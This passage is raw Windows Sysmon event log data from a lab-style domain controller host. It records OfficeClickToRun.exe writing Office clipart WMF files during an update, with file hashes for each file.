Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02448_.WMFMD5=9EC4244BB6D1E6C9AA94E612E1CC2875,SHA256=78AE24DB7E24510EC233578AAE5C2D38EBA98E7F8959E2DF16272CA1702402BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02446_.WMFMD5=996182D3652FDC6CB6F3702ACB9E7249,SHA256=517A219FE96C212D5ED46F05D3D672A9BB1027F941D72A1C73B11983905A40CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02444_.WMFMD5=F9D74E5A1A7A255D050C8F7ACBA77DB8,SHA256=532A2C0243105B5265E2F7CD957C766883E81013197A27AC6AD65D12AEEF64D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02443_.WMFMD5=AC74ADEDAF365C0D857BBB0663F4001D,SHA256=41B65D5B3464B72C4A752D8F18C3977072105E442C5C21060F1E20B6FB13452D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02441_.WMFMD5=25AF35A8A1B30E031238667BD7130B4C,SHA256=EFF1504F05BAFE5FCD5468B5C66E1CD58F8A04A1753E41C45FB6896FCEA87782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02439_.WMFMD5=6596EB8F2183D1A6C5B07587AC03F746,SHA256=1FAA21FED17E1E7E6C84EEC69640B5DED448F254ACDA7E4ACC1A32BEE6F59F3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02435_.WMFMD5=6C09C270B8BAE12647C3F3C0BC93B12D,SHA256=36EF34E997BA230F02E6CDB2F8EC57C9E6F5A5ACA2F3F1FF9448B5735F0CDC24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02431_.WMFMD5=ACECC4EF7433A23787FB52650D455B72,SHA256=867F2515BDE947D7C00F794CD594BC160688710ACABC811E2DD4E7E16E4B400B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02426_.WMFMD5=988AEEA424A03F7782DC83A7A9E9DE5D,SHA256=CBD59B9455E3019D357D9A2D92EEB694E0D466F9C29B3EA8A8CAB7B39FE862C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02424_.WMFMD5=68A5433B8DDC78E1D9DF71BABEDE4488,SHA256=B5F1BBE05F11B2F278F6B49C48CF773B58F7C25FE3DE0CF1663E66B77F4D4E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02423_.WMFMD5=3A819BD6307A99BDF57CB0C678876D49,SHA256=747671DAA6B83168BFE89E25A5FCDEA38BE35C9E1FB4A4DC5A8C01D8501C3508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02417_.WMFMD5=5A53650839B747A255D50C759E9C9E29,SHA256=1B9F63D7EA1ED82D5D36E9F1AC22988C7A26BE06D72367BA94F074A39BFCE209,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02413_.WMFMD5=420C702653A68397B3D172C93396E0F9,SHA256=7C30AA7FAADAA905FE52FC927B521EE9BBBDF03FDBD57560BB433EEB302FAED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02407_.WMFMD5=27FAEBE000ADBE290E640F0279BF8467,SHA256=9DDAFDF883F161677093EF9A921D28286E61AC884C3F7DD00E86AC392D13422A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02405_.WMFMD5=FABB1917FD807B4C927D5D828833BA3C,SHA256=6592A09ADD685E8B886EB9C7046DA7431FEAAC554FDEE685B8A4A0C749DAF94E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02404_.WMFMD5=B914D8E4238D937E5589A45B642CF472,SHA256=0E3CD53551519DE70C2EFECE4BDED15F595526F1073ADADECC561AFA80A8EEC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02400_.WMFMD5=61C3B68291337037A4141F9C1E276A3C,SHA256=EE0781D39EE6C5AFEAE8CC2D443FACF556865F8B4655A0DE0F53D7CED74456B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02398_.WMFMD5=30E1F50FBDBB86D666A1A4152E5FF5C3,SHA256=78A122ABEFE2038BDCB29087E9295B1A052F330CC4606C4D61CEF1E929DC0D11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02390_.WMFMD5=F5D99B3F295EB694EC4C2FB27D119418,SHA256=655CD6080E858C143F0A6E38DEFA3B9FB2E4BFF6093607ACA444007D06BEFB08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02389_.WMFMD5=E483A733A9FBB44747702E2446BBB0D9,SHA256=9D9A1255B3CDF31ADC71457B1DB76E06859E58F95CF6ED54FDAB85DA135418CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02388_.WMFMD5=5666E7E2F0A46612582CDF2FDCAEF3B8,SHA256=8B70C8ED5479AB4C6342EE34EF5668B6EE33CD0ABD0ABCCDC7E2D8CCDE7ED45E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02386_.WMFMD5=4A605F35E7DACEE4BEC67A58063C2636,SHA256=95228121FF2A7F5441EA6598E7F4A39861EFEED6E7F85032314476362396DAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02384_.WMFMD5=3B01B7F02A24C5C9AE0B22779943D865,SHA256=489FD1D8B8A34D24049746D78B0A766CC54123FE0B6E2723F79A11B0C9034199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02373_.WMFMD5=D84C208419E869DF0CA572E741CBC7BC,SHA256=BA2461F56CD1F07591D0BA763D135E5C15908B28C66570F493316652FBA7BB06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02371_.WMFMD5=1CBCEDAF1AAFF5F099743187E4616534,SHA256=95CFBC107B809E4A4968CBE4F67077C837A79347ED0ECBB65E15D0536C390436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02368_.WMFMD5=22CACF41CF47093B7414C993BD6C9C91,SHA256=484200777D722D63614D3D407F5870EB924B5CABE5F46FDD20DDE1209C3ED71D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02361_.WMFMD5=113D68115C522D3F500A7DD1284CD28D,SHA256=1C3E1C640EA8AE76D974110765821CD9D78CC4D5F007E6B8E781A2A9FA43DD0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02356_.WMFMD5=66C11FFDDB83A50A7254C315BF913D12,SHA256=A2B790FBCD1AC3666BA7FDDD7346089E05B36CA510286525CF0819D92BC375A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02264_.WMFMD5=F48497FE1DBB430DEE68084FDAC75957,SHA256=F957C6A3F2650E07C1BE3262ABEE08AAFB64DCC0C28DFD046E52266EEDCC55BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02262_.WMFMD5=82E8711B3E29E2C1621254202143EDB5,SHA256=04DAFC4D6B94592952A532E2681F36AF1F3D4E05FD5C4774DF694CB59329DDBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02127_.WMFMD5=4B45CA05C132D83FF001042F665619FC,SHA256=287B734D449237F5B91C750463B36D61C573BE6711C14876E054501A92109F68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02126_.WMFMD5=FAC6DB342EDDB29389056AD4D19DCC7D,SHA256=2861FA5456890347D52F5968DB8315AFCF2C454BAE358CA4A0BE1CD0A0037D51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02125_.WMFMD5=741A89C8FB372002CF33B73E970C64E6,SHA256=60DC2EEA0BF53D5E4A8C62171053DCB434DDD26274E325DF3F94A89E88817E8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02124_.WMFMD5=5174954DCD3D2A943AF1EB83AB6CF5B2,SHA256=3BE173E0091FB0C0E2B9E04337B61C408067B8F03BA6CBF9B763FCE8B581418F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02093_.WMFMD5=3002F076FCC81ED35EBB82EAD4318874,SHA256=4DF7AD06CAEA0DE68AC0BB4D535246BF46A1060ABC028E104EA8AF1A3B0E0A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02092_.WMFMD5=AC4DDD169E48F0C9C7FB6CD58BA5490B,SHA256=2A8A149FA963E002C26EA165A586F0FE8878F5FDEF75C21409491A88A9AC0E45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02091_.WMFMD5=1EF1877FB3045DF15C3B32509B5AF0B0,SHA256=B4B8ED8562777EF7304D79401FD8B79962ACFD54D496107B7AC13A94ADB6F9A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02066_.WMFMD5=FFF92AE99EAF2A3F2F2D9930C02C7B5B,SHA256=40C65F04F05A8D7C2FFC53A718408C7024639955E92A4A0EE48B4E7603765467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02041_.WMFMD5=EFE07D847ECF48E2C370CD80E025EDFE,SHA256=B850F885DEAA00166DCDAB0C1DB81D030D42BDF802E69C89BF29AAB406F7F4AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02009_.WMFMD5=486550FADA29C6687BF4283419919100,SHA256=29B0557FC3988DC9835B8F26990F7B8BEE6FA3BD474F5BD43092E3AAE01A7BEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01866_.WMFMD5=47F3F145E9A5E1DBE7B98B44947CB26F,SHA256=6F78E8E97EE0664DF97AF96E3696DA347DBDBBDEA0A4E7B67E8566B70C6723B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01858_.WMFMD5=9ADA330FD3B096498237F6217D7359A7,SHA256=FFF9F01F00DB843A1AABBFEE387650EF56ADB35FE62BD1D4D39B8B32FA6CC7E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01852_.WMFMD5=4DFAD247585B61F9C2D345816AA7783E,SHA256=2280A5EFD6FF548F2E7E984FEDCA5333A4C609048BAD983F0DB6E3B8410758DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01849_.WMFMD5=16471E0A377CE5ECC53EB125D66EE730,SHA256=5DE5A4DB34AC3F12A6FE620F9CD5A780D848DECAE53B372A9AFE71B305B312E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01848_.WMFMD5=496ABA38ACB5F13FDA9ABB7F7A9DBCC8,SHA256=9315623B90577DA581E8E2B57F0CAA81077F7392AE24B8BF38FFA4D307D0A88D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 